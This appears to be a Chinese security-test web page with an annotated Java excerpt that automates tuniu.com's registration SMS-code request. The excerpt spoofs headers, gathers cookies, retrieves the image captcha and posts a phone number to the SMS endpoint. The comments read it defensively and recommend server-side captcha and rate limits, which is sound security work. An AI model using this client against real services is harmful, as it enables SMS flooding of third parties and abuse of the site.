安全测试 : 途牛旅游网(tuniu.com)网站短信接口安全测试
发布时间:2021-04-28 点击数:4552
安全问题不容忽视,不要亡羊补牢!
// Excerpt from a test client for the registration SMS-code flow on passport.tuniu.com.
// The enclosing method and the helpers getCookie, getImgeCode and userClick are not shown here,
// so notes on what they do are hedged.
// Defender's reading: every value set below (Accept, X-Requested-With, Referer, Cookie) is
// client-controlled, so none of them can tell a browser from a script. Protection of an
// SMS-send endpoint has to be enforced server-side: a single-use captcha bound to the session,
// plus per-number, per-session and per-IP rate limits and send caps.

// Configure request headers
inheads.put("Accept", "*/*");
inheads.put("X-Requested-With", "XMLHttpRequest");
inheads.put("Referer", "https://passport.tuniu.com/register?origin=http://www.tuniu.com/ssoConnect");
// Presumably requests the registration page so the server's cookies end up in outheads;
// confirm against getCookie.
getCookie(cookieStore, httpclient, "https://passport.tuniu.com/register?origin=http://www.tuniu.com/ssoConnect", inheads, outheads);
// Flatten the collected cookies into one string; the Cookie header is only set when it is non-null.
String cookieStr = GetCookieHead.CookieHashToString(outheads);
if (cookieStr != null) {
inheads.put("Cookie", cookieStr);
}
// Configure request parameters
// NOTE(review): paramsList is not referenced again in the visible lines, and identify_code takes
// whatever input holds under "imgCode" at this point, before the assignment further down.
List<BasicNameValuePair> paramsList = new ArrayList<BasicNameValuePair>();
paramsList.add(new BasicNameValuePair("tel", phone));
paramsList.add(new BasicNameValuePair("identify_code", input.get("imgCode")));
paramsList.add(new BasicNameValuePair("intlCode", "0086"));
paramsList.add(new BasicNameValuePair("isReg", "1"));
// Configure and send the requests
// Presumably retrieves the image captcha from imgUrl and returns its text; confirm against getImgeCode.
String imgCode = this.getImgeCode(phone, httpclient, cookieStore, "get", imgUrl, inheads, outheads, input, outMap);
// A null captcha result is stored as an empty string.
input.put("imgCode", imgCode != null ? imgCode : "");
// Presumably POSTs to smsUrl; the outcome is kept in retEntity. Server-side, this is the request
// where captcha validity and send-rate limits should be checked and logged.
retEntity = this.userClick(httpclient, cookieStore, "post", smsUrl, inheads, outheads, input, phone);